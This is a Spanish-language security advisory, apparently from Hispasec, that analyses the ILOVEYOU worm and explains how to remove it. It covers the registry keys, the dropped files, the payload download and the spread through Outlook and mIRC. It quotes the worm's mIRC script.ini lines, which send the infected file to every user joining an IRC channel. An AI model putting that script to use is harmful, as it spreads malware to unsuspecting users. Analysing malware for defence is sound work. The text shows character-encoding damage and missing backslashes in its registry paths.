El gusano llega en forma de mensaje, con el asunto «ILOVEYOU» y un archivo adjunto con el nombre de «LOVE-LETTER-FOR-YOU.TXT.vbs», aunque la extensión VBS (Visual Basic Script) puede permanecer oculta en las configuraciones por defecto de Windows, lo cual puede hacer pensar que se trate de un inocente archivo de texto.
Cuando se abre el archivo infectado el gusano procede a infectar el sistema, y expandirse rápidamente enviándose a todos aquellos contactos que tengamos en la agenda del Outlook, incluidas las agendas globales corporativas. Es importante no ejecutar ningún archivo adjunto que venga con dicho mensaje y avisar de forma inmediata a los administradores de la red de la llegada de dicho email.
Según las primeras líneas de código el gusano procede de Manila, Filipinas, y el autor se apoda «spyder»:
rem barok -loveletter(vbe) -i hate go to school-
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
El virus crea las siguientes claves en el registro, que deber n ser borradas para evitar que el virus se ejecute de forma autom tica nada m s iniciar el sistema:
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunMSKernel32
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesWin32DLL
Tambi’n ser necesario borrar los archivos:
WIN32DLL.VBS
ubicado en el directorio de Windows (por defecto WINDOWS)
MSKERNEL32.VBS
LOVE-LETTER-FOR-YOU.VBS
ubicados en el directorio de sistema (por defecto WINDOWSSYSTEM)
El gusano modifica la p gina de inicio de Internet Explorer con una de las 4 direcciones, que elige segon un nomero aleatorio, bajo el dominio http://www.skyinet.net. Estas direcciones apuntan al fichero WIN-BUGSFIX.EXE, una vez descargado modifica el registro de Windows para que este ejecutable tambi’n sea lanzado en cada inicio del sistema y modifica de nuevo la configuraci¢n de Internet Explorer situando en esta ocasi¢n una p gina en blanco como inicio.
Si el gusano ha conseguido realizar el paso anterior tambi’n deberemos borrar el archivo:
WIN-BUGSFIX.EXE
ubicado en el directorio de descarga de Internet Explorer
y la entrada del registro:
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunWIN-BUGSFIX
El gusano tambi’n detecta la presencia del programa mIRC, buscando algunos de los siguientes archivos: «mirc32.exe», «mlink32.exe», «mirc.ini» y «script.ini». En caso de que se encuentren en el sistema el gusano escribe en el mismo directorio su propio archivo SCRIPT.INI donde podemos encontrar, entre otras l¡neas, las siguientes instrucciones:
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick «&dirsystem&»LOVE-LETTER-FOR-YOU.HTM
n3=}
Las cuales provocan que el gusano se autoenv¡e v¡a DCC, a trav’s del archivo LOVE-LETTER-FOR-YOU.HTM, a todos los usuarios de IRC que entren en el mismo canal de conversaci¢n donde se encuentre el usuario infectado.
En este caso debemos de borrar los archivos:
LOVE-LETTER-FOR-YOU.HTM
ubicado en el directorio de sistema (por defecto WINDOWSSYSTEM)
SCRIPT.INI (si contiene las instrucciones comentadas)
ubicado en el directorio de mIRC
El virus sobrescribe con su c¢digo los archivos con extensiones .VBS y .VBE. Elimina los archivos con extensiones .JS, .JSE, .CSS, .WSH, .SCT y .HTA, y crea otros con el mismo nombre y extensi¢n .VBS en el que introduce su c¢digo. Tambi’n localiza los archivos con extensi¢n .jpg, .JPEG, .MP3 y .MP2, los elimina, y crea otros donde el nuevo nombre est formado por el nombre y la extensi¢n anterior m s VBS como nueva extensi¢n real.
Por oltimo, recordar a todos nuestros lectores la posibilidad de que este mismo gusano pueda presentarse bajo otros nombres de fichero con tan s¢lo unas simples modificaciones en su c¢digo. Recordamos una vez m s que no debemos abrir o ejecutar archivos no solicitados, aunque estos provengan de fuentes confiables. En caso de duda, cuando la fuente es confiable, siempre deberemos pedir confirmaci¢n al remitente para comprobar que el env¡o ha sido intencionado y no se trata de un gusano que se env¡a de forma autom tica.
Antonio Ropero
antonior@hispasec.com
Bernardo Quintero
bernardo@hispasec.com
